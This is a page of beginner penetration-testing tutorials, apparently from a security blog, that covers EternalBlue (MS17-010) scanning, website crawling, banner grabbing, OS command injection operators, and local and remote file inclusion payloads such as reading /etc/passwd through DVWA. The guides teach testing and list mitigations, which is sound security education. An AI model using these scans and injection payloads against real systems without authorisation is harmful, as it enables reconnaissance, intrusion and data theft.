Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

3 ways to scan Eternal Blue Vulnerability in Remote PC

Hello Friends! As we all known that Microsoft windows 7 are exploitable by eternal blue with SMBv1. Then Microsoft patches this vulnerability by updating the SMB version. Still there are a large number of windows 7 users who didn’t update their system. Now if a security tester wants to separate vulnerable system from update system he requires some scanning to identify vulnerable system.

Eternal scanner is an network scanner for Eternal Blue exploit CVE-2017-0144 .

Target: Windows 7
Attacker: Kali Linux

Open the terminal in your kali Linux and type following command to download it from github.


git clone https://github.com/peterpt/eternal_scanner.git && cd eternal_scanner


After then when it gets successfully install you need run the script for in Oder to lunch the scanner on terminal by typing following:
./escan

Once the scanner is lunched inside the terminal further it will ask to enter target IP or you can also add a range of IPs for scanning.

We have given only single IP for scanning i.e. 192.168.1.106 as target.

Then it will start scanning and dumb those IP which are vulnerable in given IP range; from screenshot you can observe it has dump 192.168.1.106:445 as vulnerable IP with SMB port 445 and save the output inside /root/eternal_scanner/vulnr.txt


When you will open the output file you will observe vulnerable IP as well as name of exploit “MS17 -010”as shown in given image.
Similarly you can scan the target using NMAP and Metasploit


NMAP

Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

The script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to determine if the target is not patched against ms17-010. Additionally it checks for known error codes returned by patched systems.
Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.

Following command will scan the SMB vulnerability using in-built certain scripts and report according to the output result.
nmap -T4 -p445 --script vuln 192.168.1.106

You can observe from given screenshot that port 445 is open and vulnerable. The target is exploitable to MS17-010 moreover Rate of Risk is High which mean it is easily vulnerable.


We can direct scan for SMB vulnerability for MS17-010 using NMAP script using following NMAP command:

nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106

From given screenshot you will observe that it has only scan for MS17-010 and found target is vulnerable against it.

From both result of NMAP we have concluded that, the target is vulnerable due to Microsoft SMBv1


METASPLOIT
Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is "STATUS_INSUFF_SERVER_RESOURCES", the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user "\" and connect to IPC$.

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106
msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit

From screenshot you can perceive that host is vulnerable to MS17-010
Great!!! Now use MS17-010 to exploit your target.

5 Ways to Crawl a Website


A Web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of Web indexing .

A Web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit.  If the crawler is performing archiving of websites it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern day database.

Let’s Begin!!
Metasploit
This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.

use auxiliary/crawler/msfcrawler
msf auxiliary(msfcrawler) > set rhosts www.tptl.in
msf auxiliary(msfcrawler) > exploit



From, screenshot you can see it has loaded crawler in order to exact hidden file from any website, for example about.php, jquery contact form, html and etc which is not possible to exact manually from website using browser. For information gathering of any website we can use it.


HTTRACK
HTTrack is a free and open source Web crawler and offline browser, developed by Xavier Roche
It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. 

Type following command inside the terminal
httrack http://tptl.in -O /root/Desktop/file

It will save the output inside given directory /root/Desktop/file


From given screenshot you can observe this, it has dumb the website information inside it which consist html file as well as JavaScript and jquery.


BLACK WIDOW
This Web spider utility detects and displays detailed information for a user-selected Web page, and it offers other Web page tools.
BlackWidow's clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter your URL of choice and press Go. BlackWidow uses multithreading to quickly download all files and test the links. The operation takes only a few minutes for small Web sites.

You can download it from here.

Enter your URL http://tptl.in in Address field and press Go.


Click on start button given on left side to begin URL scanning and select a folder  to save the output file.
Fromscreenshot you can observe that I had browse C:\Users\RAJ\Desktop\tptl in order to store output file inside it.


When you will open target folder tptl you will get entire data of website either image or content, html file, php file and JavaScript all are saved in it.


WEBSITE RIPPER COPIER

Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader software to save website data. WRC can download website files to local drive for offline browsing, extract website files of a certain size and type, like image, video, picture, movie and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed anti pop-up Web / offline browser.

Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS and FTP connections, access password-protected sites, support Web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads

You can download it from here.

Choose “web sites for offline browsing” option.


Enter the website URL as http://tptl.in and click on next.


Mention directory path to save the output result and click run now.

When you will open selected folder tp you will get fetched css,php,html and js file inside it.


BURP SUITE SPIDER
Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.
For more detail read our privious articles from here.
From given screenshot you can observe that I had fetched the http request of http:// tptl.in; now send to spider with help of action tab.


The targeted website has been added inside the site map under target tab as a new scope for web crawling.  From screenshot you can see it started web crawling of the target website where it has collected the website information in the form of php, html and js.

5 ways to Banner Grabbing

Banner are refers as text message that received from host. Banners usually contain information about a service, such as the version number.
Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. An attacker can make use of banner grabbing in order to discover network hosts and running services with their versions on their open ports and more over operating systems so that he can exploits it.


Nmap
A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds.
The banner will be shortened to fit into a single line, but an extra line may be printed for every increase in the level of verbosity requested on the command line.

Type following command which will fetch banner for every open port in remote PC.
nmap -sV --script=banner 192.168.1.106

From screenshot you can read the services and their version for open ports fetched by NMAP Script to grab banner for the target 192.168.1.106


Following command will grab the banner for selected port i.e. 80 for http service and version.
nmap -Pn -p 80 -sV --script=banner 192.168.1.106
As result it will dumb “http-server-header: Apache/2.2.8 (Ubuntu) DAV/2”


CURL
Curl –I is use for head in order to shown document information only; type following command to grab HTTP banner of remote PC.
curl -s -I 192.168.1.106 | grep -e "Server: "
As result it will dumb “http-server-header: Apache/2.2.8 (Ubuntu) DAV/2”


TELNET
Type following command to grab SSH banner of remote PC.
telnet 192.168.1.106 22
As result it will dumb “SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1”

 NETCAT
Type following command to grab SSH banner of remote PC.
nc –v 192.168.1.106 22
As result it will dumb “SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1”

 DMITRY
DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C. DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more.

Dmitry –b is use for banner grabbing for all open ports; Type following command to grab SSH banner of remote PC.

dmitry -b 192.168.1.106
From screenshot you can see it has shown banner for open port 21, 22, 23 and 25.
In this way Attacker can grab the services and their version for open ports on remote PC.

Beginner Guide to OS Command Injection

The dynamic Web applications may make the most of scripts to call up some functionality in the command line on the web server to process the input that received from the client and unsafe user input may led to OS command injection.  OS Command injection is refer as shell injection attack arise when an attacker try to perform system level commands through a vulnerable application in order to retrieve information of  web server or try to make unauthorized access into server .

Impact Analysis
Impact: Critical
Ease of Exploitability: Medium
Risk Rating: High


In this attack the attacker will inject his unwanted system level command so that he can fetch the information of web server; for example: ls , whoami , uname -a and etc.


Let’s consider a scenario where web application allows user to PING an IP other user so that it get confirms that the host connection is alive. Through given screenshot it is clear what will be output when host IP will submit.

Verify parameters to inject data

The following parameters should be tested for command injection flaws, as the application may be using one of these parameters to build a command back at the web server:

·         GET: In this method input parameters are sent in URLs.
·         POST: In this method, input parameters are sent in HTTP body.
·         HTTP header: Applications frequently use header fields to discover end users and display requested information to the user based on the value in the headers.
Some of the important header fields to check for command injection are:
·         Cookies
·         X-Forwarded-For
·         User-agent
·         Referrer

METACHARACTER
Using vulnerability scanner attacker come to know that current web application is vulnerable to command injection and try injecting system level unwanted command using Meta character.

Metacharacter are symbolic operators which are use to separate actual command from unwanted command. The ampercent (&) was used as a separator that would divide the authentic input and the command that you are trying to inject.

It will more clear in following image where attacker will inject his payload dir using metacharacter that retrieve present directory of web server.  

As result it will dump following output as shown in given image where it has validated wrong user input.


OS Command Injection Operators

The developer possibly will set filters to obstruct the some metacharacter. This would block our injected data, and thus we need to try out with other metacharacters too, as shown in the following table:
Operators
Description
;
The semicolon is most common metacharacter used to test an injection flaw. The shell would run all the commands in sequence separated by the semicolon.
&
It separates multiple commands on one command line. It runs the first command then the second command.
&&
It runs the command following  && only if the preceding command is successful
||(windows)
It run the command following || only if the preceding command fails. Runs the first command then runs the second command only if the first command did not complete successfully.
|| ( Linux)
Redirects standard outputs of the first command to standard input of the second command
The unquoting metacharacter is used to force the shell to interpret and run the command between the backticks. Following is an example of this command: Variable= "OS version `uname -a`" && echo $variable
()
It is used to nest commands
#
It is used as command line comment

Steps to exploit – OS Command Injection
Step 1: Identify the input field
Step 2: Understand the functionality
Step 3: Try the Ping method time delay
Step 4: Use various operators to exploit OS command Injection

Type of Command Injection

Error based injection: When attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proof that the application is vulnerable to the command injection. The displayed result might be in the form of an error or the actual outcomes of the command that you tried to run. An attacker then modifies and adds additional commands depending on the shell the web server and assembles information from the application.

Blind based Injection: The results of the commands that you inject will not displayed to the attacker and no error messages are returned it similar as blind SQL injection. The attacker will use another technique to identify whether the command was really executed on the server.



Mitigation-OS Command Injection

·         Strong server side validation
·         Implement a white list
·         OS Hardening
·         Use build in API’s for interacting with the OS if needed. More secure!!
·         Avoid applications from calling out directly the OS system commands

Beginner Guide to File Inclusion Attack (LFI/RFI)

You can insert the content of one PHP file into another PHP file before the server executes it, with the include () function. The function can be used to create functions, headers, footers or element that will be reused on multiple pages.

This will help developers to make it easy to change the layout of complete website with minimal effort.

If there is any change required then instead of changing thousands of files just change included file.

Assume we have a standard footer file called "footer.php", that looks like this


echo "Copyright © 2010-" . date("Y") . " hackingartices.in
";
?>

To include the footer file in a page, use the include statement


Welcome to Hacking Articles

Some text.
Some more text.

Example 2

Assume we have a file called "vars.php", with some variables defined:

$color='red';
$car='BMW';
?>








Welcome to my home page!

echo "I have a $color $car.";
?>


Output: I have red BMW


PHP Require Function
The require statement is also used to include a file into the PHP code.
However, there is one big difference between include and require; when a file is included with the include statement and PHP cannot find it, the script will continue to execute:
Example 3




Welcome to my home page!


 
include 'noFileExists.php';
echo "I have a $color $car.";
?>



Output: I have a
If we do the same example using the require statement, the echo statement will not be executed because the script execution dies after the require statement returned a fatal error:




Welcome to my home page!


 
require 'noFileExists.php';
echo "I have a $color $car.";
?>


No output result



PHP Required_once Function

Require_once() using this function we can access the data of another page once when you may need to include the called file more than once, It works the same way. The only difference between require and require_once is that If it is found that the file has already been included, calling script is going to ignore further inclusions.

Example 4
echo.php

echo "Hello";
?>

test.php

require('echo.php');
require_once('echo.php');
?>

outputs: "Hello"

Note
allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is also disabled

You can enable allow_url_include from php.ini

/etc/php7/apache2/php.ini
allow_url_include = On


File Inclusion Attacks

It is an attack that allows an attacker to include a file on the web server through a php script. This vulnerability arises when a web application lets the client to submit input into files or upload files to the server.

This can lead following attacks:

·         Code execution on the web server
·         Cross Site Scripting Attacks (XSS)
·         Denial of service (DOS)
·         Data Manipulation Attacks

Two Types:
Local File Inclusion
Remote File Inclusion

Local File Inclusion (LFI)


Local file inclusion vulnerability occur when a file to which to PHP account has accessed is passed as a parameter to the PHP function “include”, or “require_once”


This vulnerability occurs, for example, when a page receives, as inputs the path to the file that has to be included  and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected.

Example – Local File Inclusion

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=file1.php


http://192.168.1.8/dvwa/vulnerabilities/fi/?page=/etc/passwd


Read complete local file inclusion attack tutorial from here

Remote File Inclusion (RFI)

Remote File Inclusion occurs when the URI of a file located on a different server is passed to as a parameter to the PHP function “include”, “include_once” , “require” , or “require_once” . PHP incorporates the content into the pages. If the content happens to be PHP source code, PHP executes the file.

PHP Remote File inclusion allows and attacker to embed his/her own PHP code inside  a vulnerable  PHP script , which may lead to disastrous results such as allowing the attacker to execute remote commands on the web server, deface parts of the web or even steal confidential information.

http://192.168.1.8/dvwa/vulnerabilities/fi/?page=file1.php
http:// 192.168.1.8/dvwa/vulnerabilities/fi/?page=http://google.com


Read complete remote file inclusion attack tutorial from here

Mitigation
·         Strong Input Validation
·         A whitelist of acceptable inputs
·         Reject any inputs that does not strictly conform to specifications
·         For filenames, use stringent whitelists that limits the character set to be used
·         Exclude directory separators such as “/”
·         Use a whitelist of allowable file extensions
·         Environment hardening
·         Develop and run your code in the most recent versions of PHP available
·         Configure your PHP applications so that it does not use register_globals
·         Set allow_url_fopen to false, which limits the ability to include files from remote locations
·         Run your code using the lowest privileges
·         Use a vetted library or framework that does not allow this weakness.

               https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
               https://www.acunetix.com